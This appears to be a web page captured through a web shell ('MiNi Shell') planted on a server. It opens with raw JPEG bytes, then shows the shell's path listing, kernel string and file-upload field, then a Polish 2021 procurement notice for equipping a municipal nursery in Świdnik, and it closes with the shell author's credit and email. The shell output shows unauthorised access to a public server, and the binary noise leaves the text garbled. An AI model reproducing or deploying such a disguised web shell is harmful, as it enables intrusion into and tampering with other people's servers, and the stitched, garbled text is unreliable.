JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210505/0004684902-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00046849 z dnia 2021-05-05</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> "Dostawa wyposażenia żłobka miejskiego przy ul. Bartłomieja Kopera w Świdniku" </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Świdnik</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019359</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Stanisława Wyspiańskiego 27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świdnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-040</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zampub@e-swidnik.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://umswidnik.bip.lubelskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> "Dostawa wyposażenia żłobka miejskiego przy ul. Bartłomieja Kopera w Świdniku" </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1787d52c-adac-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00046849</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004073/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa wyposażenia Żłobka Miejskiego przy ul. Bartłomieja Kopera w Świdniku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://umswidnik.bip.lubelskie.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu oudzieleniezamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciumini Portalu,który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego podadresem:https://epuap.gov.pl/wps/portal (dane konta zamawiającego na ePUAP -odbiorca:UrządMiasta Świdnik, adres skrytki ePUAP: /umswidnik/SkrytkaESP ) oraz pocztyelektronicznej (z wyjątkiem składania ofert) , na adres zampub@e-swidnik.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówieniapublicznego,musiposiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp donastępującychformularzy:„Formularz do złożenia, zmiany, wycofania oferty lub wniosku” orazdo„Formularzadokomunikacji”.2. Wymagania techniczne i organizacyjne wysyłania iodbieraniadokumentówelektronicznych, elektronicznych kopii dokumentów i oświadczeń orazinformacjiprzekazywanych przyich użyciu opisane zostały w Regulaminie korzystania zsystemuminiPortal orazWarunkachkorzystania z elektronicznej platformy usług administracji publicznej(ePUAP).3.Maksymalny rozmiarplików przesyłanych za pośrednictwem dedykowanych formularzy:„Formularz złożenia, zmiany,wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi150MB. 4. Zadatę przekazaniaoferty, wniosków, zawiadomień, dokumentów elektronicznych,oświadczeń lubelektronicznych kopiidokumentów lub oświadczeń oraz innych informacji przyjmuje siędatę ichprzekazania na ePUAP. 5. Wpostępowaniu o udzielenie zamówienia komunikacjapomiędzyZamawiającym a Wykonawcami wszczególności składanie oświadczeń,wniosków,zawiadomień orazprzekazywanie informacji odbywasię elektronicznie za pośrednictwemdedykowanego formularza:„Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionegoprzez miniPortal. Wewszelkiej korespondencji związanej z niniejszym postępowaniem ZamawiającyiWykonawcy posługująsię numerem ogłoszenia BZP. 7. Zamawiający może również komunikować sięz Wykonawcami zapomocą poczty elektronicznej, email: zampub@e-swidnik.pl 8. Dokumentyelektroniczne, składane sąprzez Wykonawcę za pośrednictwem „Formularza do komunikacji”jakozałączniki. Zamawiającydopuszcza również możliwość składania dokumentów elektronicznych zapomocą pocztyelektronicznej, na wskazany w pkt 7 adres email (nie dotyczy składania ofert). Sposóbsporządzeniadokumentów elektronicznych musi być zgody z wymaganiami określonymiwrozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. wsprawie sposobu sporządzania i przekazywania informacjioraz wymagań technicznych dladokumentów elektronicznych oraz środków komunikacji elektronicznejw postępowaniu o udzieleniezamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) orazrozporządzeniu MinistraRozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawiepodmiotowych środków dowodowychoraz innych dokumentów lub oświadczeń, jakich może żądaćzamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art.13ogólnegorozporządzeniaoochronie danych osobowych z dnia 27 kwietnia 2016r. (Dz.Urz. UE L 119z04.05.2016r. (RODO)dotycząca osób fizycznych, których dane osobowe pozyskał Zamawiający,wszczególności:wykonawcy będącego osobą fizyczną, wykonawcy będącego osobąfizycznaprowadzącąjednoosobową działalność gospodarczą, pełnomocnika wykonawcy będącegoosobąfizyczna, członkaorganu zarządzającego wykonawcy, będącego osobą fizyczną, osobyfizycznejskierowanej doprzygotowania i przeprowadzenia postępowania o udzieleniezamówieniapublicznego:Zgodnie z art.13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady(UE)2016/679 z dnia 27 kwietnia 2016 r.w sprawie ochrony osób fizycznych w związku zprzetwarzaniemdanych osobowych i w sprawieswobodnego przepływu takich danych oraz uchyleniadyrektywy95/46/WE (ogólne rozporządzenie oochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str.1), dalej„RODO”, informujemy, że: a)administratorem Pani/Pana danych osobowych jest GminaMiejskaŚwidnik z siedzibą wŚwidniku,ul.Stanisława Wyspiańskiego 27,b) z inspektorem ochronydanychosobowych w GminieMiejskiej Świdnik można kontaktować się poprzez e-mail: iod@eswidnik.pl,c)Pani/Pana daneosobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celuzwiązanymzpostępowaniem o udzielenie niniejszego zamówienia publicznego wtrybieprzetargunieograniczonego,d) odbiorcamiPani/Pana danych osobowych będą osoby lubpodmioty,którymudostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust.3 ustawyz dnia29 stycznia 2004 r. – Prawo zamówień publicznych (t.j.Dz. U. z 2019 r. poz. 1843), dalej„ustawaPzp”;e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp,przezokres 4lat od dnia zakończeniapostępowania o udzielenie zamówienia, a jeżeli czastrwaniaumowyprzekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;f)obowiązekpodaniaprzez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczącychjestwymogiemustawowym określonym w przepisach ustawy Pzp, związanym z udziałem wpostępowaniuoudzielenie zamówienia publicznego;konsekwencje niepodania określonych danychwynikają zustawyPzp; g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będąpodejmowane wsposóbzautomatyzowany, stosowanie do art. 22 RODO;h) posiada Pani/Pan:- napodstawie art. 15RODOprawo dostępu do danych osobowych Pani/Pana dotyczących;- na podstawieart. 16 RODOprawo dosprostowania Pani/Pana danych osobowych ;- na podstawie art. 18 RODOprawo żądaniaodadministratora ograniczenia przetwarzania danych osobowych z zastrzeżeniemprzypadków, októrychmowa w art. 18 ust. 2 RODO; i) prawo do wniesienia skargi do Prezesa UrzęduOchronyDanychOsobowych, gdy uzna Pani/Pan,że przetwarzanie danych osobowych Pani/Panadotyczącychnaruszaprzepisy RODO;j) nie przysługuje Pani/Panu:- w związku z art. 17 ust. 3 lit. b, d lube RODOprawo dousunięcia danych osobowych;- prawo do przenoszenia danych osobowych, o którymmowa wart. 20RODO;- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzaniadanychosobowych, gdyżpodstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust.1 lit. cRODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WIZP-Z 271.25.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis przedmiotu zamówienia wg Załącznik Nr 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39220000-0 - Sprzęt kuchenny, artykuły gospodarstwa domowego i artykuły domowe oraz artykuły cateringowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będziestosować następujące kryteria oceny ofert: cena - 60%, okres gwarancji i rękojmi - 40%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia podmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 8.4.4 Zobowiązanie podmiotu trzeciego do oddania do dyspozycji Wykonawcyniezbędnychzasobów na potrzeby wykonania zamówienia (jeżeli dotyczy).8.4.5 Pełnomocnictwo lub innedokumenty z których wynika prawo do podpisania oferty oraz do podpisania innych dokumentówskładanych wraz z ofertą, chyba że Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych wszczególności rejestrów publicznych w rozumieniu ustawy zdnia 17 lutego 2005r. oinformatyzacji działalności podmiotów realizujących zadania publiczne(Dz.U. z 2020r. poz.346 zpóźn.zm.).8.4.6 Pełnomocnictwo do reprezentowania wszystkichWykonawców wspólnieubiegających się o udzielenie zamówienia, ewentualnie umowa owspółdziałaniu z której będziewynikać przedmiotowe pełnomocnictwo (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty przez podmioty występujące wspólnie w formularzuofertynależypodać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składającychofertę,aoferta powinna być podpisana przez ustanowionego pełnomocnika. Sposóbocenyspełnianiawarunków udziału postępowaniu w przypadku składania oferty przezwykonawcówwspólnieubiegających się o udzielenie zamówienia podano w pkt 5.4)ogłoszenia.Do ofertydołączyćnależy pełnomocnictwo do reprezentowania wszystkichwykonawców wspólnieubiegających sięo udzielenie zamówienia, ewentualnie umowę owspółdziałaniu z której będziewynikaćprzedmiotowe pełnomocnictwo. Żaden z wykonawcówwspólnie ubiegających się oudzieleniezamówienia nie może podlegać wykluczeniu z udziału wpostępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza dokonywanie zmian w umowie na następującychwarunkach:1.Zamawiający dopuszcza możliwość zmiany terminu realizacji przedmiotu umowywprzypadkach: 1) działania siły wyższej, uniemożliwiającej wykonanie umowy wokreślonymterminie – o czas działania siły wyższej oraz czas potrzebny do usunięcia skutkówtegodziałania,2) W przypadku wystąpienia opóźnienia z przyczyn zależnych od Zamawiającegowudostępnieniu pomieszczeń w budynku Urzędu Miasta Świdnik, termin wykonaniaprzedmiotuumowy ulegnie wydłużeniu o czas opóźnienia.2. Zamawiający dopuszcza możliwośćzmianywynagrodzenia w przypadku urzędowej zmiany stawki podatku od towarów i usług(VAT)odpowiednio poprzez podwyższenie lub obniżenie wynagrodzenia brutto z tym,żewynagrodzenie netto pozostanie niezmienione.3. Zmiany w umowie można wprowadzićzazgodą obu stron na piśmie, pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Ofertę złożyć należy na skrytkę ePUAP Zamawiającego: /umswidnik/SkrytkaESP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-17 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-15</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-05 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com